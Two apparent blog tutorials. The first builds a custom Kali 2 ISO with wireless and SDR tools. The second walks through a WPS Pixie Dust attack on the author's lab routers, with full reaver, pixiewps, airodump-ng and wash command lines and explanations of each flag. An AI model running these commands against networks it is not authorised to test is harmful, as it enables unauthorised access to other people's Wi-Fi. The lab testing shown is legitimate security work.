Kali 2 Sana Custom ISO Build – Software Defined Radio (SDR) & Wireless Tools

So I have been meaning to do this for ages as who likes configuring a system every time anyway, it’s the definition of insanity doing the same thing again and again so let’s fix that and automate the installation of Kali and modify it along the way so that you only install what you want or need in the process!

First things first you need to update your system with

apt-get update

1_Kali_Sana_Prep_Work_update

1_Kali_Sana_Prep_Work_update

Install live-build

apt-get install git live-build

2_Kali_Sana_Install_Live_Build

2_Kali_Sana_Install_Live_Build

Next you need to create a directory, git clone the live-build-config, change into the directory and then check whats inside

mkdir Kali_2.0_Custom_Build
git clone git://git.kali.org/live-build-config.git
cd live-build-config
ls

3_Kali_Sana_git_clone_live_build

3_Kali_Sana_git_clone_live_build

Now use the editor of your choice for this task and open up the following directory

nano kali-config/variant-xfce/package-lists/kali.list.chroot

4_Kali_Sana_Modify_Packages

4_Kali_Sana_Modify_Packages

For the GUI I am going to use kali-desktop-xfce as I like the speed that comes with it as it’s quite basic and light, I don’t really want the full package as I only really use the wireless and plan on using the Software Defined Radio (SDR) tools too so no need to install everything in there (You may be different so decide here what you want or need before you continue).

I will just be removing the hash from the start of kali-linux-sdr and kali-linux-wireless in order to only install those tools.

The kali.list.chroot file will look like this below

5_Kali_Sana_Packages_Before_Modification

5_Kali_Sana_Packages_Before_Modification

After it should look like I have it below, so save the file and continue to the next step

6_Kali_Sana_Packages_After_Modification

6_Kali_Sana_Packages_After_Modification

Create a new file called 01-unattended-boot.binary in kali-config/common/hooks/

nano kali-config/common/hooks/01-unattended-boot.binary

Chmod it to make it executable also

chmod +x kali-config/common/hooks/01-unattended-boot.binary

7_Kali_Sana_Unattended_File_Configuration

7_Kali_Sana_Unattended_File_Configuration

Paste in the following:

#!/bin/sh

cat >>binary/isolinux/install.cfg <<END
label install
menu label ^Unattended Install
menu default
linux /install/vmlinuz
initrd /install/initrd.gz
append vga=788 — quiet file=/cdrom/install/preseed.cfg locale=en_US keymap=us hostname=kali domain=local.lan
END

And once again save the file, courtesy of the Kali dojo.

8_Kali_Sana_Unattended_File_Configuration_Created

8_Kali_Sana_Unattended_File_Configuration_Created

When you have this done the next step is to get yourself or create a preseed file so that all the questions will be automatically answered for you, I’m going to pull mine from the kali dojo which the Offensive Security Team use for building their images, you can download it from their website located here.

Pull down the file and save it in the correct directory like this
wget https://www.kali.org/dojo/preseed.cfg -O ./kali-config/common/includes.installer/preseed.cfg

9_Kali_Sana_Unattended_Preseed_wget

9_Kali_Sana_Unattended_Preseed_wget

Now we are nearly there but the desktop is going to be bare so find a high quality image of your choosing and modify the output below in order to replace the background image with your own custom one. As I am indecisive though I am going to use the following image once again from the Kali dojo located here.

Make a new directory
mkdir -p kali-config/common/includes.chroot/usr/share/images/desktop-base/

Download and save the image into the newly created directory
wget https://www.kali.org/dojo/wp-blue.png -O kali-config/common/includes.chroot/usr/share/images/desktop-base/kali-wallpaper_1920x1080.png

10_Kali_Sana_Unattended_Desktop_Background

10_Kali_Sana_Unattended_Desktop_Background

Start off your new build

./build.sh –variant xfce –distribution sana –verbose

“build.sh” is the script that will be used to build your ISO from your configuration options
“–variant xfce” specifies you want to use the xfce desktop environment
“–distribution sana” selects the correct distribution for Kali Sana 2.0
“–verbose” will give your plenty of output on your screen to stare at for a while as it may take some time, don’t worry about reading everything as everything is parsed to a log file so you can review it all when finished anyway.

11_Kali_Sana_Build_Unattended_ISO_Start

11_Kali_Sana_Build_Unattended_ISO_Start

Patience at this point as this may take some time, the last time I created a full ISO with everything it took two hours in total to complete. With only the wireless and SDR tools I expect it to take less time to complete (This actually took six hours to complete for me).

When finished it will look like the following below without any errors

12_Kali_Sana_Build_Unattended_ISO_Finish

12_Kali_Sana_Build_Unattended_ISO_Finish

The ISO will be saved in the /live-build-config/images directory

13_Kali_Sana_Build_Unattended_ISO_File_location

13_Kali_Sana_Build_Unattended_ISO_File_location

At this point I like to copy the ISO out of my VM into my host OS. Depending on your setup this will be different.

14_Kali_Sana_Build_Unattended_ISO_File_Copy_Host

14_Kali_Sana_Build_Unattended_ISO_File_Copy_Host

Configure VirtualBox to your liking, if your unsure of configuration settings please refer to this tutorial for guidance. When booting just click on “Install” and watch the configuration magic happen all on it’s own!

15_Kali_Sana_Select_Install_to_automatically_install

15_Kali_Sana_Select_Install_to_automatically_install

Log in with
username: root
password: toor

16_Kali_Sana_XFCE_Custom_SDR_WIreless_tools_first_boot

16_Kali_Sana_XFCE_Custom_SDR_WIreless_tools_first_boot

Select the default configuration when prompted

17_Kali_Sana_XFCE_Custom_SDR_WIreless_tools_first_boot_select_default_config

17_Kali_Sana_XFCE_Custom_SDR_WIreless_tools_first_boot_select_default_config

Now you have your own custom built XFCE ISO with only Software Defined Radio (SDR) and wireless related tools that will automatically install for you, cool isn’t it? You can also use it as a live image too without installing it.

18_Kali_Sana_XFCE_Custom_SDR_WIreless_tools_complete

18_Kali_Sana_XFCE_Custom_SDR_WIreless_tools_complete

You can do all the normal things like install VirtualBox guest additions, for help on this refer to this tutorial

19_Kali_Sana_XFCE_Custom_SDR_WIreless_tools_VirtualBox_Guest_additions_install

19_Kali_Sana_XFCE_Custom_SDR_WIreless_tools_VirtualBox_Guest_additions_install

Have fun building!

 

18 – WPS Offline Pixie Dust Attack

Hey everyone it’s been a while since my last blog entry and I recently started playing around with the WPS offline Pixie Dust Attack which I first mentioned back in May 2015 and wanted to document it as I have not had any success in exploiting a router vulnerable to this attack but that doesn’t mean we can’t exploit it using the older reaver method which I previously wrote about here and here. Please refer to my previous tutorial for some background on attacking WPS.
For this tutorial I am using Kali 2.0 “sana” in a VM which has all the necessary tools required to preform this attack so just get the latest ISO of Kali updated fully and you will be good to follow along 🙂

I have two routers that are susceptible to the old method using reaver so I used them again for this tutorial, unfortunately this doesn’t work but the the process does so it’s worthy of a blog entry!

First as always get your card into monitor mode, I actually came across a random issue that looks like it is a bug in Kali 2 “sana” when running airmon-ng

“airmon-ng check kill” will kill anything that may be interfering with your card when in monitor mode
“airmon-ng start wlan0” as you probably know now will place your card into monitor mode

1_Monitor_mode_Kali_Sana

1_Monitor_mode_Kali_Sana

As you can see instead of a new interface called “mon0” being created we instead have “wlan0mon” which will do the same thing. I thought it was worth mentioning as it was a weird issue.

Checking with iwconfig will show you that monitor mode is actually enabled so you don’t need to make any further changes:

“iwconfig” used below to make sure that the card is in monitor mode

2_iwconfig_monitor_mode_check

2_iwconfig_monitor_mode_check

BUT sometimes I have also found that even though it says the card is in monitor mode when you start airodump-ng sniffing the airwaves you actually see nothing so you just have to put the interface down and set monitor mode manually on the card.

“ifconfig wlan0mon down” this will put the interface down
“iwconfig wlan0mon mode monitor” this will manually set monitor mode on the wireless interface
“ifconfig wlan0mon up” this will put the interface up again

3_Kali_sana_manual_monitor_mode_configuration

3_Kali_sana_manual_monitor_mode_configuration

After you do this if you run

“airodump-ng wlan0mon” to make sure you are sniffing the airwaves

You will see things are working as expected:

4_airodump-ng_output_after_manual_configuration

4_airodump-ng_output_after_manual_configuration

My lab routers for attacking are named “dlink” and “test” under the ESSID column above

Trying this attack against the access point labeled test first:

“reaver” runs reaver
“-i wlan0mon” specifies that you want to use the wlan0mon interface for this attack
“-b 2C:B0:5D:XX:XX:XX” is used to specify the MAC address of the access point you are targeting
“-vv” is used to display very verbose output
“-w” used to mimic a Windows 7 registrar
“-n” is used as this target access point always sends a NACK
“-S” is to only use small DH keys to improve the cracking speed
“-c 1” is used to specify the channel on which the access point resides

reaver -i wlan0mon -b 2C:B0:5D:XX:XX:XX -vv -w -n -S -c 1

5_reaver_pixiedust_attack_kali_2_sana

5_reaver_pixiedust_attack_kali_2_sana

You may get different results with different access points so make sure you look at the reaver and pixiewps man pages and try different switches! I already know this access point is not vulnerable but just to show you what to do with this information all you need to do is open up pixiewps and enter in the following details you just enumerated in order to crack WPS on the target access point:

“pixiewps” runs pixiewps
“-e” Enrollee public key
“-s” Enrollee hash1
“-z” Enrollee hash2
“-a” Authentication session key
“-n” Enrollee nonce (mode 2,3,4)
“-S” Small Diffie-Hellman keys (PKr not needed)

pixiewps -e PKE -s E-Hash1 -z E-Hash2 -a AuthKey -n E-Nonce -S

6_pixiewps_kali_2_sana_pin

6_pixiewps_kali_2_sana_pin

As you can see no WPS pin is found but that just means my access point is not vulnerable to this offline attack method, it is however vulnerable to the online method as can be seen in previous tutorials here and here.

Now I also have another access point to check labeled “dlink” as you can see above so lets jump straight to it!

“reaver” to run reaver
“-i wlan0mon” will run on the interface of your wireless card
“-b 00:18:E7:XX:XX:XX” is to set the MAC address of the target access point
“-vv” runs in very verbose mode
“-w” is to mimic a Windows 7 registrar
“-n” as the target AP always sends a NACK
“-S” to use small DH keys to improve the crack speed
“-c 6” is to set the channel the access point is running on

reaver -i wlan0mon -b 00:18:E7:XX:XX:XX -vv -w -n -S -c 6

This PIN generated is incorrect as the PIN on the router is neither of the PIN’s generated below but it’s worth trying if the access point is either a D-link of Belkin, you may get lucky with the default PIN generator created by the devttys0 team especially if your router is listed in the D-link or Belkin posts showing how they were reversed in order to generate these WPS PIN’s.

7_Kali_sana_2_pixiewps_d-link_default_pin_generation

7_Kali_sana_2_pixiewps_d-link_default_pin_generation

Another method

“reaver” to run reaver
“-i wlan0mon” will run on the interface of your wireless card
“-b 00:18:E7:XX:XX:XX” is to set the MAC address of the target access point
“-a” to auto detect the best advanced options for the target access point
“-vv” runs in very verbose mode
“-w” is to mimic a Windows 7 registrar
“-K 1” to Run pixiewps with PKE, PKR, E-Hash1, E-Hash2 and E-Nonce (Ralink, Broadcom, Realtek). Increment the value after -K.
“-n” as the target AP always sends a NACK
“-S” to use small DH keys to improve the crack speed
“-c 6” is to set the channel the access point is running on

reaver -i wlan0mon -b 00:18:E7:XX:XX:XX -a -vv -w  -K 1 -n -S -c 6

8_Kali_sana_2_pixie_dust_reaver_WPS_PIN_method

8_Kali_sana_2_pixie_dust_reaver_WPS_PIN_method

Even though these methods aren’t working for me it doesn’t mean they won’t work for you so give them a try on your home router and see if you are vulnerable to this attack as the amount of time needed to crack a wireless network is greatly decreased if this method works so it’s definitely worth trying.

Before I end this tutorial though I just want to point you in the direction of some cool switches I discovered in the latest version of the aircrack-ng suite which you can use for WPS enumeration.

“airodump-ng” to start airodump-ng sniffing the airwaves
“-i wlan0mon” to set the interface to sniff on
“-W” to display if the access point supports WPS
The first field of the  column  indicates the version supported. The second field indicates the WPS config methods of which there can be more than one separated by a comma:
USB = USB method,
ETHER = Ethernet,
LAB = Label,
DISP = Display,
EXTNFC = External NFC,
INTNFC = Internal NFC,
NFCINTF  =  NFC Interface,
PBC = Push Button,
KPAD =  Keypad. Locked is displayed when the AP setup is locked.
“-M” to display the manufacturer from the IEEE OUI list

airodump-ng -i wlan0mon -W -M

9_Kali_sana_airodump-ng_WPS_enumeration

9_Kali_sana_airodump-ng_WPS_enumeration

Wash also has a cool feature now too to enumerate some more information from your router

“wash” to run wash
“-i wlan0mon” to run the interface of your wireless card
“-g” to pipe output and run reaver alongside wash to get the chipset
“-c 1” specifies the channel you wish to run on

wash -i wlan0mon -g -c 1

10_Kali_sana_wash_enumeration

10_Kali_sana_wash_enumeration

It’s handy for checking if the access point is locked out quickly before trying the reaver or Pixie Dust Attack.

That’s it for now, attacking WPS has come a long way in a short period of time and it’s only a matter of time until this is a simple procedure that works in a matter of seconds to minutes once enough PIN generation algorithms are reversed and added to make this much simpler than WEP to crack. You remember how easy WEP was to crack right, it’s like traveling back in time to 2005 all over again.